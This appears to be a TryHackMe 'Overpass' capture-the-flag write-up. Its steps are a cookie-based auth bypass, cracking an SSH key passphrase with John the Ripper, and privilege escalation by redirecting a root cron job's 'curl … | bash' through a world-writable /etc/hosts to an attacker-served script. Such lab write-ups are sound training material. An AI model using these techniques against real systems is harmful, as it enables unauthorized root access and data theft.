TryHackMe - Overpass

Scan with nmap

kali@kali:~/ctf/thm/overpass$ sudo nmap -sC -O -sV 10.10.183.194
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-24 19:40 PST
Nmap scan report for 10.10.183.194
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
|   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Overpass
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=1/24%OT=22%CT=1%CU=37143%PV=Y%DS=4%DC=I%G=Y%TM=600E3DE
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(
OS:R=Y%DF=Y%T=40%W=F507%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.73 seconds

Web page

Poking around the web pages on the host shows a minimal description of the "product" which is a password manager. You can find out about the "team", downloads source and or binaries, and if you poke around enough, find a /admin page with a typical username and password form.

At first I downloaded the source for the password manager. It's straightforward in that it has a few commands for reading or writing passwords. The passwords are "encrypted" using rot47, and that's about it. Nothing to exploit in there for now.

I tried a few of the usual suspects on the login page, probing for SQLi, a little brute forcing before using the hint that it wasn't going to work (thank goodness, those get old after a while), and had to take a break to think about it some more. You can (and should) look at all of the source code for a page like this. The HTML shows nothing particularly interesting, but there is javascript on the login page that handles posting the username and password rather than allowing the browser to do it automatically via the form:

async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }
}

It occurred to me after a while that the only difference on the client side between a successful login and a failure was taking the else path which sets the "SessionToken" cookie and reloads the /admin page. I decided to try setting a cookie with that name to see what happens. I didn't even try to be clever about setting a value yet.

Broken Authentication

Broken authentication is in OWASP's Top 10 Web Application Security Risks and it's pretty much what this page suffers from. The mere presence of the "SessionToken" cookie, regardless of value, is enough to present us with different content for the admin page. This page displays a private key and a message.

Since you keep forgetting your password, James, I've set up SSH keys for you.

If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.
Also, we really need to talk about this "Military Grade" encryption. - Paradox

Using the private key

I saved the private key to an id_rsa file, but in order to use it (presumably to log in via ssh) I was going to need to get the password for it. Our old pal John the Ripper might do the job.

First, convert the id_rsa file to something John can crack:

kali@kali:~/ctf/thm/overpass$ python ~/tools/ssh2john.py id_rsa > id_rsa.hash

Then try and crack it:

kali@kali:~/ctf/thm/overpass$ john id_rsa.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
james13          (id_rsa)

Logging in with ssh

Now we can connect to the machine via ssh using the id_rsa private key for authentication and the password we cracked for it. We can guess at a username of james as well since the message mentioned it.

kali@kali:~/ctf/thm/overpass$ ssh -i id_rsa james@10.10.183.194
The authenticity of host '10.10.183.194 (10.10.183.194)' can't be established.
ECDSA key fingerprint is SHA256:4P0PNh/u8bKjshfc6DBYwWnjk1Txh5laY/WbVPrCUdY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.183.194' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-108-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Jan 25 03:59:15 UTC 2021

  System load:  0.08               Processes:           88
  Usage of /:   22.3% of 18.57GB   Users logged in:     0
  Memory usage: 12%                IP address for eth0: 10.10.183.194
  Swap usage:   0%


47 packages can be updated.
0 updates are security updates.


Last login: Sat Jun 27 04:45:40 2020 from 192.168.170.1
james@overpass-prod:~$ 

Got user.txt?

james@overpass-prod:~$ ls -la
total 48
drwxr-xr-x 6 james james 4096 Jun 27  2020 .
drwxr-xr-x 4 root  root  4096 Jun 27  2020 ..
lrwxrwxrwx 1 james james    9 Jun 27  2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james  220 Jun 27  2020 .bash_logout
-rw-r--r-- 1 james james 3771 Jun 27  2020 .bashrc
drwx------ 2 james james 4096 Jun 27  2020 .cache
drwx------ 3 james james 4096 Jun 27  2020 .gnupg
drwxrwxr-x 3 james james 4096 Jun 27  2020 .local
-rw-r--r-- 1 james james   49 Jun 27  2020 .overpass
-rw-r--r-- 1 james james  807 Jun 27  2020 .profile
drwx------ 2 james james 4096 Jun 27  2020 .ssh
-rw-rw-r-- 1 james james  438 Jun 27  2020 todo.txt
-rw-rw-r-- 1 james james   38 Jun 27  2020 user.txt
james@overpass-prod:~$ cat user.txt
thm{********************************}

How to get root.txt?

I've become fond of using LinPEAS to quickly look for ways to escalate privileges. I'm also tending to remember to check sudo -l first just in case that turns something up first. In this case LinPEAS points out there is a cron job set to run as root every minute:

james@overpass-prod:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

So this very dangerous cron job downloads buildscript.sh and pipes it to bash. Maybe we can alter the content of buildscript.sh or what this job downloads?

overpass.thm

But what is overpass.thm? Some kind of host that this machine can resolve... "thm" is not a gTLD but there are other ways than DNS for a hostname to be resolved.

james@overpass-prod:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 overpass-prod
127.0.0.1 overpass.thm
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
james@overpass-prod:~$ ll /etc/hosts
-rw-rw-rw- 1 root root 250 Jun 27  2020 /etc/hosts

/etc/hosts reveals that overpass.thm is at 127.0.0.1 which is this localhost. But notice that the /etc/hosts file is world writeable. This means we can change that IP address to something else. Like a machine we control, our attacker machine.

Attacker web server

First we make up a new buildscript.sh to do something we want. Since it will be executed by root on the victim machine, we can do anything we want. In the interest of time, I like guessing at where I will find the root.txt file and just copying it somewhere we have access to and making it readable:

cp /root/root.txt /home/james/root.txt && chmod 666 /home/james/root.txt

With our directory laid out like this, a simple way to run a web server is using python.

kali@kali:~/ctf/thm/overpass$ ll -R
.:
total 2688
-rwxr-xr-x 1 kali kali     495 Nov 17 21:21 buildscript.sh
drwxr-xr-x 3 kali kali    4096 Jan 24 16:57 downloads
-rw------- 1 kali kali    1765 Jan 24 15:56 id_rsa
-rw-r--r-- 1 kali kali    2458 Jan 24 19:55 id_rsa.hash
-rw-r--r-- 1 kali kali    5094 Nov 17 21:16 overpass.go
-rwxr-xr-x 1 kali kali 2722020 Nov 17 21:29 overpassLinux

./downloads:
total 4
drwxr-xr-x 2 kali kali 4096 Jan 24 17:01 src

./downloads/src:
total 4
-rw-r--r-- 1 kali kali 73 Jan 24 16:58 buildscript.sh
kali@kali:~/ctf/thm/overpass$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...                                                                                                                                                                                   
10.10.183.194 - - [24/Jan/2021 20:17:23] "GET /downloads/src/buildscript.sh HTTP/1.1" 200 - 

We can see that after a minute, something (the victim machine) requested the buildscript.sh file and it was successful (200). Switching back to the victim machine confirms it worked:

james@overpass-prod:~$ ll
total 56
drwxr-xr-x 6 james james 4096 Jan 25 04:20 ./
drwxr-xr-x 4 root  root  4096 Jun 27  2020 ../
lrwxrwxrwx 1 james james    9 Jun 27  2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james  220 Jun 27  2020 .bash_logout
-rw-r--r-- 1 james james 3771 Jun 27  2020 .bashrc
drwx------ 2 james james 4096 Jun 27  2020 .cache/
drwx------ 3 james james 4096 Jun 27  2020 .gnupg/
drwxrwxr-x 3 james james 4096 Jun 27  2020 .local/
-rw-r--r-- 1 james james   49 Jun 27  2020 .overpass
-rw-r--r-- 1 james james  807 Jun 27  2020 .profile
drwx------ 2 james james 4096 Jun 27  2020 .ssh/
-rw------- 1 james james  811 Jan 25 04:17 .viminfo
-rw-rw-rw- 1 root  root    38 Jan 25 04:20 root.txt
-rw-rw-r-- 1 james james  438 Jun 27  2020 todo.txt
-rw-rw-r-- 1 james james   38 Jun 27  2020 user.txt
james@overpass-prod:~$ cat root.txt
thm{********************************}

Bonus

The CTF was written a while ago and mentions there is an additional flag. The first person to get that flag and submit it wins a TryHackMe subscription code. I decided it had already been achieved and didn't bother. One imagines once you are executing code as root you can do anything like make the tryhackme home directory readable etc.

Ok, I lied. Now that I've written this up I decided to look into it. I altered the buildscript.sh to make /home/tryhackme world read-writeable. Inside the directory is a .overpass file. We can copy its contents to our own ~/.overpass file and run the overpassLinux program to "decrypt" it.

james@overpass-prod:/home/tryhackme$ cat .overpass 
,LQ?2>6QiQ%CJw24<|6 $F3D4C:AE:@? r@56Q[QA2DDQiQ8>%sJ=QN.
kali@kali:~/ctf/thm/overpass$ ./overpassLinux 
Welcome to Overpass
Options:
1       Retrieve Password For Service
2       Set or Update Password For Service
3       Delete Password For Service
4       Retrieve All Passwords
5       Exit
Choose an option:       4
TryHackMe Subscription Code      gmTDyl